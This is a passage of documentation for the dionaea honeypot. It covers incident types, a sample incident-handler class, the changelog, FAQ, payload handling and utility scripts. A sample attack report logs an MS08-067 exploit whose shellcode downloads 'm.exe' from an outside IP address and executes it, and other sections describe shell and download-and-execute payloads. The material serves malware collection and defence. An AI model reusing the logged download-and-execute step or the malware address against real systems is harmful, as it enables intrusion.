1733          /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg  2>&1 | python asan_symbolize.py
1734
1735   Logging
1736       Logging should be used to report errors and for debugging purposes.  It
1737       must not be used to report attacks.  Incidents should be used for  this
1738       purpose.  For more information have a look at the ihandler section.
1739
1740       Comparison glib2 and Python
1741
1742                                ┌─────────┬──────────┐
1743                                │glib2    │ Python   │
1744                                ├─────────┼──────────┤
1745                                │debug    │ debug    │
1746                                ├─────────┼──────────┤
1747                                │info     │ info     │
1748                                ├─────────┼──────────┤
1749                                │warning  │ warning  │
1750                                ├─────────┼──────────┤
1751                                │critical │ error    │
1752                                ├─────────┼──────────┤
1753                                │error    │ critical │
1754                                └─────────┴──────────┘
1755
1756       WARNING:
1757          In  glib2 a critical message means critical warning. But in Python a
1758          critical message is handled as critical error.
1759
1760       WARNING:
1761          An error message in glib2 or a critical message in a  Python  module
1762          will terminate the program immediately.
1763
1764   Incident
1765       Some of the incidents reported by the dionaea core are listed below.
1766
1767       dionaea.connection.tcp.accept:
1768          A new TCP connection has been accepted by dionaea.
1769
1770       dionaea.connection.tls.accept:
1771          A new SSL/TLS connection has been accepted by dionaea.
1772
1773       dionaea.connection.tcp.connect:
1774          Reported after dionaea has connected to an external service via TCP.
1775
1776       dionaea.connection.tls.connect:
1777          Reported after dionaea has connected to an external service via
1778          SSL/TLS.
1779
1780       dionaea.connection.udp.connect:
1781          Reported after dionaea has connected to an external service via UDP.
1782
1783       dionaea.connection.free:
1784          A connection has been closed and freed.
1785
1786       dionaea.connection.tcp.listen:
1787          Fired after a TCP service has been bound and is listening for incom‐
1788          ing connections.
1789
1790       dionaea.connection.tls.listen:
1791          Fired after a SSL/TLS service has been bound and is listening for
1792          incoming connections.
1793
1794       dionaea.connection.tcp.pending:
1795
1796       dionaea.connection.tcp.reject:
1797          An incoming connection has been rejected by the server.
1798
1799       dionaea.connection.link.early:
1800
1801       dionaea.connection.link:
1802          Reported to give the log management the chance to link  two  connec‐
1803          tions.
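       As an added example, not dionaea's own code, here is what an incident
       handler built on the list above looks like: an ihandler-style
       dispatcher that routes each incident by its origin name, records
       accepted and outbound connections, ties a child to its parent on
       dionaea.connection.link, and emits the finished record on
       dionaea.connection.free.  The Connection and Incident stand-ins, the
       dispatch-by-origin naming and the con/parent/child attributes are
       assumptions, and the replayed incident sequence is constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional


# Constructed stand-ins for dionaea's connection and incident objects.  The
# attribute names are an assumption, not dionaea's own classes.
@dataclass
class Connection:
    transport: str   # "tcp", "tls" or "udp"
    protocol: str    # service or module name, e.g. "smbd"
    local: str       # "host:port" on dionaea's side
    remote: str      # "host:port" of the peer


@dataclass
class Incident:
    origin: str                           # e.g. "dionaea.connection.tcp.accept"
    con: Optional[Connection] = None      # accept / connect / free incidents
    parent: Optional[Connection] = None   # dionaea.connection.link only
    child: Optional[Connection] = None    # dionaea.connection.link only


class ConnectionTracker:
    """ihandler-style dispatcher: handle_incident() routes each incident to a
    method named handle_incident_<origin with '.' replaced by '_'> (assumed
    convention).  Attack data lands in self.records, never in the log."""

    def __init__(self) -> None:
        self.open: Dict[int, dict] = {}   # id(con) -> record of a live connection
        self.records: List[dict] = []     # finished records, in free() order

    def handle_incident(self, icd: Incident) -> bool:
        name = "handle_incident_" + icd.origin.replace(".", "_")
        handler = getattr(self, name, None)
        if handler is None:
            return False   # not an incident this handler cares about
        handler(icd)
        return True

    def _track(self, con: Connection, direction: str) -> None:
        self.open[id(con)] = {
            "direction": direction, "transport": con.transport,
            "protocol": con.protocol, "local": con.local, "remote": con.remote,
            "parent": None,   # filled in by a later link incident
        }

    # Inbound connections (accept) and dionaea's own outbound ones (connect).
    def handle_incident_dionaea_connection_tcp_accept(self, icd): self._track(icd.con, "accept")
    def handle_incident_dionaea_connection_tls_accept(self, icd): self._track(icd.con, "accept")
    def handle_incident_dionaea_connection_tcp_connect(self, icd): self._track(icd.con, "connect")
    def handle_incident_dionaea_connection_tls_connect(self, icd): self._track(icd.con, "connect")
    def handle_incident_dionaea_connection_udp_connect(self, icd): self._track(icd.con, "connect")

    def handle_incident_dionaea_connection_link(self, icd: Incident) -> None:
        # Tie the child (e.g. an outbound download) to the attacker's connection.
        parent = self.open.get(id(icd.parent))
        child = self.open.get(id(icd.child))
        if parent is not None and child is not None:
            child["parent"] = parent["remote"]

    def handle_incident_dionaea_connection_free(self, icd: Incident) -> None:
        # A free reported before the link would leave the child unlinked.
        record = self.open.pop(id(icd.con), None)
        if record is not None:
            self.records.append(record)


def replay_sample_attack() -> List[dict]:
    """Replay a constructed sequence: an attacker hits smbd, the shellcode
    makes dionaea fetch a file over TCP, then both connections are freed."""
    attacker = Connection("tcp", "smbd", "10.0.1.11:445", "198.51.100.23:47650")
    fetch = Connection("tcp", "download", "10.0.1.11:51000", "198.51.100.7:80")
    tracker = ConnectionTracker()
    for icd in [
        Incident("dionaea.connection.tcp.accept", con=attacker),
        Incident("dionaea.connection.tcp.connect", con=fetch),
        Incident("dionaea.connection.link", parent=attacker, child=fetch),
        Incident("dionaea.connection.tcp.pending"),   # no handler here: ignored
        Incident("dionaea.connection.free", con=fetch),
        Incident("dionaea.connection.free", con=attacker),
    ]:
        tracker.handle_incident(icd)
    return tracker.records
```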
1804

CHANGELOG

1806   0.8.0 - (master)
1807   0.7.0 - (2018-05-01)
1808       build
1809
1810       • Add initial cmake support
1811
1812       ci
1813
1814       • Add Debian 9
1815
1816       dionaea
1817
1818       • Fix build error with OpenSSL 1.1.0
1819
1820       • Improve OpenSSL 1.1.0 support
1821
1822       • Cleanup connection code
1823
1824       • Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1825
1826       • Fixing chroot bugs (Thanks Michal Ambroz)
1827
1828       doc
1829
1830       • Add additional information
1831
1832       • Doxygen config file for dionaea c core
1833
1834       • Ubuntu 16.04 install instructions
1835
1836       package
1837
1838       • Remove old and deprecated debian package config
1839
1840       python
1841
1842       • Fix typo in config key
1843
1844       • Fix hardcoded python path
1845
1846       • Fix compilation on CentOS7 (Thanks Michal Ambroz)
1847
1848       python/http
1849
1850       • Initial support to handle SOAP requests
1851
1852       python/log_incident
1853
1854       • Improve hash generator
1855
1856       • Fix bug if parent is unknown
1857
1858       • Remove IDs from list if processed
1859
1860       python/mongo
1861
1862       • Initial support to simulate a MongoDB server
1863
1864       python/pyev
1865
1866       • Update from 0.8 to 0.9 to support Python >= 3.6
1867
1868       python/smb
1869
1870       • Add support for WannaCry and SambaCry (Big thanks to gento)
1871
1872       • Add additional config options to change identity
1873
1874       python/util
1875
1876       • Find Download commands for Linux shell
1877
1878   0.6.0 - (2016-11-14)
1879       dionaea
1880
1881       • Fix build for musl lib
1882
1883       doc
1884
1885       • Fix install instructions
1886
1887       • Extend README.md
1888
1889       python/blackhole
1890
1891       • New service/Initial version
1892
1893       python/emu_scripts
1894
1895       • New handler to analyse downloaded scripts
1896
1897       • Detect VBScript and PowerShell
1898
1899       • Limit number of subdownloads
1900
1901       python/http
1902
1903       • Clean up
1904
1905       • Use state vars instead of strings
1906
1907       • Add template support

           • Jinja 2 template engine

           • nginx template
1908
1909       python/mysql
1910
1911       • Dump files from SELECT queries
1912
1913       • Extract URLs from functions
1914
1915       • Variable handler
1916
1917       • Support for selecting variables
1918
1919       python/p0f
1920
1921       • Fix decode error
1922
1923       python/pptp
1924
1925       • Fix error if config is empty
1926
1927   0.5.1 - 2016-09-05
1928       dionaea
1929
1930       • Don’t report ‘connection.free’ incident too early to prevent segmen‐
1931         tation faults
1932
1933   0.5.0 - 2016-08-06
1934       dionaea
1935
1936       • Handle byte objects in incidents
1937
1938       • Bump required Python version from 3.2 to 3.4
1939
1940       python/http
1941
1942       • Detect Shellshock attacks
1943
1944       python/log_incident
1945
1946       • Initial support to export raw incident information
1947
1948       python/log_sqlite
1949
1950       • Log credentials from the ftp service
1951
1952       python/memcache
1953
1954       • Initial support for the memcached protocol
1955
1956       python/pptp
1957
1958       • Clean up
1959
1960       • Handle CallClearRequests packets
1961
1962       • Values for hostname, vendor name and firmware revision are  now  cus‐
1963         tomizable
1964
1965       python/util
1966
1967       • New function to detect shellshock attacks and report detected URLs
1968
1969   0.4.2 - 2016-07-02
1970       doc
1971
1972       • Add information about log levels for developers
1973
1974       python/*
1975
1976       • Replace all critical log messages with error messages
1977
1978       • Catch  exceptions  in  handle_io_in()  and handle_io_out() to improve
1979         stability
1980
1981       • Catch exceptions in incident handlers
1982
1983       python/sip
1984
1985       • Fix error while reading config values
1986
1987       python/upnp
1988
1989       • Fix errors in log messages
1990
1991       more
1992
1993       • Add templates to create issues and merge requests on github
1994
1995   0.4.1 - 2016-06-14
1996       core
1997
1998       • Initialize stdout logger earlier
1999
2000       • Log error, critical and warning by default
2001
2002       python/*
2003
2004       • In glib2 critical is a critical warning
2005
2006       • Add support for exceptions
2007
2008       • Check file path and show warnings
2009
2010       python/log_json
2011
2012       • Add support for flat object lists to work with ELK stack
2013
2014   0.4.0 - 2016-05-31
2015       core
2016
2017       • Replace lcfg with Key-value file parser from glib
2018
2019       ci
2020
2021       • Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2022
2023       doc
2024
2025       • Add initial documentation for missing modules
2026
2027       • Update documentation to reflect config changes
2028
2029       • Add processor documentation
2030
2031       python/*
2032
2033       • Replace lcfg with yaml configs
2034
2035       • Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2036
2037       • Rename incident handlers from logsql to log_sqlite
2038
2039       • Rename incident handlers from uniqdownload to submit_http_post
2040
2041       python/mysql
2042
2043       • Enable processor pipeline
2044
2045   0.3.0 - 2016-03-30
2046       core
2047
2048       • Code clean up (Thanks to Katarina)
2049
2050       • Vagrant based dev environment
2051
2052       • Customize ssl/tls parameters for autogenerated certificates
2053
2054       doc
2055
2056       • Initial version of sphinx based documentation
2057
2058       python/ftp
2059
2060       • Support to customize response messages
2061
2062       • Small fixes
2063
2064       python/hpfeeds
2065
2066       • Initial ihandler support (Thanks to rep)
2067
2068       python/http
2069
2070       • Customize HTTP response headers
2071
2072       • Return HTTP/1.1 instead of HTTP/1.0
2073
2074       python/log_json
2075
2076       • Initial ihandler support
2077
2078       python/mqtt
2079
2080       • Initial protocol support (Thanks to gento)
2081
2082       python/pptp
2083
2084       • Initial protocol support (Thanks to gento)
2085
2086       python/upnp
2087
2088       • Initial protocol support (Thanks to gento)
2089
2090   0.2.1 - 2014-07-16
2091       core
2092
2093       • Support for cython and cython3
2094
2095       • Fixes to build with glib 2.40
2096
2097       • Remove build warnings
2098
2099       • Support libnl >= 3.2.21
2100
2101       python/http
2102
2103       • Fix unlink() calls
2104
2105       python/virustotal
2106
2107       • virustotal API v2.0
2108
2109   0.2.0 - 2013-11-02
2110       Last commit by original authors.
2111
2112   0.1.0
2113       • Initial release.
2114

FAQ

2116       WARNING:
2117          The documentation is work in progress.
2118
2119   Build/Install
2120       I get gcc: command not found?
2121          Install gcc.
2122
2123       How to uninstall it?
2124          rm -rf /opt/dionaea
2125
2126       I get binding.pyx:…: undeclared name  not  builtin:  bytes  during  the
2127       python modules build.
2128          Install a recent cython version.
2129
2130       I get Python.h not found during compiling cython
2131          Install appropriate headers for your python interpreter.
2132
2133       I  do  not  use  ubuntu/debian  and the instructions are useless for me
2134       therefore.
2135          I use debian/ubuntu, and therefore I can only  provide  instructions
2136          for debian/ubuntu, but you are free to send me a diff for your oper‐
2137          ating system.
2138
2139       I use Redhat/Centos 5 and the installation is frustrating and a mess as
2140       nothing works.
2141          That's right, but I did not choose your operating system.  Here is a
2142          list of outdated or missing packages for your chosen distribution:
2143          all.  Yes, you’ll even have to install glib (you’ll have 2.10 where
2144          2.20 is required) from source.  Getting python3 compiled with a
2145          recent sqlite3 version installed to /opt/dionaea requires editing
2146          the setup.py file (patch <http://p.carnivore.it/KDIFWt>).  I
2147          experienced this wonderful operating system myself … You really
2148          have to love your distro to stick with it, even if it ships software
2149          versions your grandma saw released in her youth.  Centos is the best
2150          distro to change distros.  No matter what you choose, it can’t get
2151          worse.
2152
2153       Unable to build.
2154
2155              ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2156              ==> default: cp:
2157              ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2158
2159              ==> default: libtool: Version mismatch error.  This is libtool 2.4.6 Debian-2.4.6-2, but the
2160              ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2161              ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2162              ==> default: libtool: and run autoconf again.
2163
2164          Try to clean your build environment.
2165
2166          WARNING:
2167              This will remove all ignored and untracked files from the direc‐
2168              tory.  Use --dry-run first to see what would be deleted.
2169
2170              git clean -xdf
2171
2172   Run
2173       I get OperationalError at unable  to  open  database  file  when  using
2174       logsqlite and it does not work at all
2175          Read the logsql instructions <#logsql>
2176
2177       I get a Segmentation Fault
2178          Read the segfault instructions <#segfault>
2179
2180       I logrotate, and after logrotate dionaea does not log anymore.
2181          Read the logrotate instructions <#logging>
2182
2183       p0f does not work.
2184          Make sure you have p0f 2.0.8 and dionaea does not listen on ::; p0f
2185          can’t deal with IPv6.
2186
2187       I’m facing a bug, it fails, and I can’t figure out why.
2188          Explain the problem, if I’m interested in the nature of the problem,
2189          as  it  does not sound like pebcak, I may ask for a shell/screen and
2190          have a look myself, and if it is worth it, you’ll even get a FAQ en‐
2191          try for some specialties of your OS.
2192
2193       Unable to bind to port after dropping privileges
2194          Dropping privileges and binding to ports lower than 1024 is only
2195          supported on Linux systems.  If some of the optional build depen‐
2196          dencies are missing, dionaea might not be able to bind to these
2197          ports either.  After enabling all log levels it should display log
2198          messages like in the example below.
2199
2200              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2201              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2202              [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2203
2204          To  fix  this  issue you have to install the kernel headers for your
2205          kernel and rebuild dionaea.  If everything works as  it  should  you
2206          might  get  log  messages like in the example below.  You might have
2207          noticed that there is now a pchild section.  This means  dionaea  is
2208          using a child process with extended privileges to bind to the port.
2209
2210              [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2211              [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2212              [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2213              [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2214              [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
2215

TIPS AND TRICKS

2217       WARNING:
2218          The documentation is work in progress.
2219
2220   Rotate bistream files
2221       Dionaea does not have, and may never have, a function or option to ro‐
2222       tate the bistream files.  But you can do this with a cron job and a
2223       simple shell script.
2224
2225       Feel free to use and modify the script below.
2226
2227          #!/bin/bash

2229          # Compress bistream files older than 2 days (skip already compressed ones)
2230          find /var/lib/dionaea/bistreams -type f -mtime +2 ! -name '*.gz' -exec gzip {} \;

2232          # Clear bistream logs from dionaea every week
2233          find /var/lib/dionaea/bistreams -type f -mtime +7 -exec rm {} \;
2234          # Remove emptied per-day directories, but keep the bistreams directory itself
2235          find /var/lib/dionaea/bistreams -mindepth 1 -type d -empty -delete
2235

SUPPORT

2237   Cui honorem, honorem
2238       Google:
2239          Google has supported 3 students to work on dionaea during GSoc 2009,
2240          GSoc 2010 and GSoc 2011.
2241
2242       SURFnet:
2243          SURFnet has supported the project in the past(2010?-2014?).  Working
2244          with SURFnet is a real pleasure.
2245
2246   Support
2247       If you are getting frustrated because things do not work for you and
2248       you already read the FAQ, join the mailing list and share your experi‐
2249       ence, or the chat.
2250
2251       GitHub
2252          Use the issue tracker to report any problem.
2253
2254          Website: Issue tracker
2255
2256       IRC
2257          From time to time some of the developers join the #nepenthes channel
2258          on freenode. irc://irc.freenode.org/nepenthes
2259
2260       Mailing List:
2261          Only a few messages every year.  Seems to be dead, no message  since
2262          2015.
2263
2264          Website: Mailinglist nepenthes-devel
2265
2266   Links
2267          • GSoC 2009 Project #10 http://honeynet.org/gsoc/project10

2269          • The Honeynet Project

2271       Old documentation:


EXPLOITATION

2274       Attackers do not seek your service, attackers want to exploit you:
2275       they’ll chat with the service for some packets, and afterwards send a
2276       payload.  dionaea has to detect and evaluate the payload to be able to
2277       gain a copy of the malware.  In order to do so, dionaea uses libemu.
2278
2279       Given certain circumstances, libemu can detect shellcode,  measure  the
2280       shellcode, and if required even execute the shellcode. Shellcode detec‐
2281       tion is done by making use of GetPC  heuristics,  others  wrote  papers
2282       about it, we decided to write libemu to do so. This detection is rather
2283       time consuming, and therefore done using threads.
2284
2285       The part of dionaea which takes care of the network  io  can  create  a
2286       copy  of all in/output run for a connection, this copy is passed to the
2287       detection facility, which is a tree of detection  facilities,  at  this
2288       moment there is only a single leaf, the emu plugin. The emu plugin uses
2289       threads and libemu to detect and profile/measure shellcode.
2290
2291       Shellcode measurement/profiling is done by running the shellcode in the
2292       libemu vm and recording API calls and arguments.  For most shellcode
2293       profiling is sufficient: the recorded API calls and arguments reveal
2294       enough information to get an idea of the attacker’s intention and act
2295       upon it.  For multi-stage shellcode, where the first exploitation
2296       stage of the shellcode would retrieve a second shellcode from the at‐
2297       tacker, profiling is not sufficient, as we lack the information ‘what
2298       to do’ from the second stage of the shellcode; in this case we need to
2299       make use of shellcode execution.  Shellcode execution is basically the
2300       same as shellcode profiling, the only differences being that we do not
2301       record the API calls, and that we allow the shellcode to take certain
2302       actions, for example creating a network connection.
2303
2304   Payloads
2305       Once we have the payload and the profile, dionaea has to guess the in‐
2306       tention, and act upon it.
2307
2308   Shells - bind/connectback
2309       This payload offers a shell (cmd.exe prompt) to the attacker, either by
2310       binding a port and waiting for the attacker to connect to us again, or
2311       by connecting to the attacker.  In both cases, dionaea offers a cmd.exe
2312       emulation to the attacker, parses the input, and acts upon the input;
2313       usually the instructions download a file via ftp or tftp.
2314
2315   URLDownloadToFile
2316       These shellcodes use the URLDownloadToFile API call to retrieve a file
2317       via http, and execute the retrieved file afterwards.
2318
2319   Exec
2320       Making use of WinExec, these shellcodes execute a single command, which
2321       has to be parsed and processed like the bind/connectback shell com‐
2322       mands.
2323
2324   Multi Stage Payloads
2325       We never know what the second stage is, therefore libemu is used to ex‐
2326       ecute the shellcode in the libemu vm.
2327

DOWNLOADS

2329       Once dionaea has obtained from the shellcode the location of the file
2330       the attacker wants it to download, dionaea will try to download the
2331       file.  The protocol to download files via tftp and ftp is implemented
2332       in python (ftp.py and tftp.py) as part of dionaea; downloading files
2333       via http is done in the curl module, which makes use of libcurl’s
2334       awesome http capabilities.  Of course libcurl can run downloads for
2335       ftp too, but the ftp services embedded in malware are designed to work
2336       with the windows ftp.exe client, and fail for others.
2337

SUBMIT

2339       Once dionaea got a copy of the worm attacking her, we may want to store
2340       the file locally for further analysis, or submit the file to  some  3rd
2341       party for further analysis.
2342
2343       dionaea can http/POST the file to several services like CWSandbox, Nor‐
2344       man Sandbox or VirusTotal.
2345

CONFIGURATION - DIONAEA.CONF

2347       If you want to change the software, it is really important to under‐
2348       stand how it works, therefore please take the time to learn how it
2349       works.  dionaea.conf is the main configuration file; the file consists
2350       of sections for:
2351
2352          • logging
2353
2354          • processors
2355
2356          • downloads
2357
2358          • bistreams
2359
2360          • submit
2361
2362          • listen
2363
2364          • modules
2365
2366   logging
2367       The logging section controls … logging, you can specify log domains and
2368       loglevel for different logfiles.  As dionaea is pretty … verbose, it is
2369       useful to rotate the logfiles using logrotate.
2370
2371          # logrotate requires dionaea to be started with a pidfile
2372          # in this case -p /opt/dionaea/var/run/dionaea.pid
2373          # adjust the path to your needs
2374          /opt/dionaea/var/log/dionaea*.log {
2375                  notifempty
2376                  missingok
2377                  rotate 28
2378                  daily
2379                  delaycompress
2380                  compress
2381                  create 660 root root
2382                  dateext
2383                  postrotate
2384                          kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2385                  endscript
2386          }
2387
2388       /etc/logrotate.d/dionaea
2389
2390   modules
2391       downloads specifies where to store downloaded malware.  bistreams spec‐
2392       ifies where to store bi-directional streams; these are pretty useful
2393       when debugging, as they allow you to replay an attack on ip-level
2394       without messing with pcap&tcpreplay, which never worked for me.  submit
2395       specifies where to send files to via http or ftp; you can define a new
2396       section within submit if you want to add your own service.  listen sets
2397       the addresses dionaea will listen to.  The default is all addresses it
2398       can find, this mode is called getifaddrs, but you can set it to manual
2399       and specify a single address if you want to limit it.  modules is the
2400       most powerful section, as it specifies the modules to load, and the
2401       options for each module.
2402
2403   logsql
2404       This  section controls the logging to the sqlite database.  logsql does
2405       not work when chrooting - python makes the path absolute and fails  for
2406       requests after chroot().
2407
2408       logsql  requires  the directory where the logsql.sqlite file resides to
2409       be writeable by the user, as well as  the  logsql.sqlite  file  itself.
2410       So,  if  you drop user privs, make sure the user you drop to is allowed
2411       to read/write the file and the directory.
2412
2413          chown MYUSER:MYGROUP /var/lib/dionaea -R
2414
2415       To query the logsql database, I recommend looking  at  the  readlogsql‐
2416       tree.py  <#readlogsqltree>  script,  for  visualisation  the gnuplotsql
2417       <#gnuplotsql> script.
2418
2419       The blog on logsql:
2420
2421          2009-11-06 dionaea sql logging
2422
2423          2009-12-08 post it yourself
2424
2425          2009-12-12 sqlite performance
2426
2427          2009-12-14 virustotal fun
2428
2429          2009-12-15 paris mission pack avs
2430
2431          2010-06-06 data visualisation
2432
2433   logxmpp
2434       This section controls the logging to xmpp services. If you want to  use
2435       logxmpp,  make  sure  to enable logxmpp in the ihandler section.  Using
2436       logxmpp allows you to share your new collected files with other sensors
2437       anonymously.
2438
2439       The blog on logxmpp:
2440
2441          2010-02-10 xmpp backend
2442
2443          2010-05-12 xmpp take #2
2444
2445          2010-05-15 xmpp take #3
2446
2447       pg_backend <#pg_backend> can be used as a backend for xmpp logging sen‐
2448       sors.
2449
2450   p0f
2451       Not enabled by default, but recommended: the p0f service.  Enable it
2452       by uncommenting p0f in the ihandlers section of the python modules
2453       section, and start p0f as suggested in the config.  It costs nothing,
2454       and gives some pretty cool, even if outdated, information about the
2455       attacker’s operating system, and you can look it up from the sqlite
2456       database, even for the rejected connections.  If you face problems,
2457       here are some hints.
2458
2459   ihandlers
2460       The ihandlers section is used to specify which ihandlers get started
2461       by ihandlers.py.  You do not want to miss p0f and logsql.
2462
2463   services
2464       services controls which services will get started by services.py.
2465

UTILS

2467       Dionaea ships with some utils, as these utils are written in python and
2468       rely on the python3 interpreter dionaea requires to operate, this soft‐
2469       ware can be found in modules/python/utils:
2470
2471          readlogsqltree <#readlogsqltree> -
2472          modules/python/readlogsqltree.py
2473
2474       readlogsqltree  is  a  python3  script  which queries the logsql sqlite
2475       database for attacks, and prints out all related information for  every
2476       attack.   This  is  an example for an attack, you get the vulnerability
2477       exploited, the time, the attacker, information about the shellcode, the
2478       file offered for download, and even the virustotal report for the file:
2479
2480          2010-10-07 20:37:27
2481            connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2482            dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483            dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484            dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485            dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486            dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487            dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488            dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489            dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2490            dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2491            dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2492            dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2493            dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2494            profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2495            offer: http://208.53.183.158/m.exe
2496            download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2497              virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2498                names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2499
2500       To create such a report of your own honeypot's activity for the last 24
2501       hours, run the following; the start timestamp has to be computed by the
           shell, so wrap it in an arithmetic expansion instead of passing the
           literal expression as a string:
2502
2503          ./readlogsqltree.py -t $(( $(date '+%s') - 24*3600 )) /var/lib/dionaea/logsql.sqlite
2504
2505
2506          gnuplotsql - modules/python/gnuplotsql.py
2507
2508       gnuplotsql is a very slow python3 script which runs some queries on the
2509       logsql sqlite database, creates graphs of the data with gnuplot, stores
2510       them on disk and creates an index of the data. The images are generated
2511       per protocol (for example an overview for the dionaea smbd service) and
2512       linked from the generated index. To create such images of your own
2513       data, run:
2514
2515          ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2516
2517       The blog has some posts on gnuplotsql as well:
2518
2519       2010-12-05 sudden death
2520
2521       2010-10-01 Infosanity’s Blog: gnuplotsql.py
2522
2523       2010-09-19 gnuplotsql
2524
2525          pg_backend - modules/python/xmpp/pg_backend.py
2526
2527       pg_backend is the backend for logxmpp, currently it is a python2.x
2528       script which uses pyxmpp to access the xmpp service. It parses the
2529       messages received and can store the events in a postgres database and
2530       the received files on disk. pg_backend requires an xmpp account.
2531
2532       Without a database:
2533
2534          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2535
2536       With a database, create the database first:
2537
2539          psql ...
2540
2541       then start the backend with the database connection parameters:
2542
2543          ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2544

SEGFAULT

2546       In case you experience a segfault, you will see something like this:
2547
2548       This is the end.  This software just had a segmentation fault.  The bug
2549       you encountered may even be exploitable.  If you want to assist in fix‐
2550       ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2551       You can create better backtraces with gdb, for more  information  visit
2552       http://dionaea.carnivore.it/#segfault  Once you read this message, your
2553       tty may be broken, simply type reset, so it will come to life again:
2554
2555          /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2556          [0x70d420]
2557          /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2558          /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2559          /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2560          /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2561          /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2562          /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2563          /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2564          /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2565          /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2566          /lib/libpthread.so.0[0xd8973b]
2567          /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2568
2569       While the backtrace itself gives an idea what might be wrong, it does
2570       not fix the problem. To fix the problem, the logfiles usually help, as
2571       dionaea is very verbose by default. Below are some hints on how to get
2572       started with debugging; see the support section for assistance.
2573
2574       debugging
2575

VALGRIND

2577       Valgrind does a great job, here is how I use it:
2578
2579          valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
2580           --log-file=dionaea-debug.log /opt/dionaea/bin/dionaea --my-dionaea-options
2581
2582
2583          gdb
2584
2585
2586          logfile assisted
2587
2588       For the above example, I was able to scrape the shellcode from the
2589       logfile, and run it in libemu, without involving dionaea at all,
2590       reducing the problem (-S reads the shellcode from stdin, -s bounds the
           number of emulated steps and -g enables sctest's getpc mode):
2591
2592          gdb /opt/dionaea/bin/sctest
2593          (gdb) run -S -s 10000000 -g < sc.bin
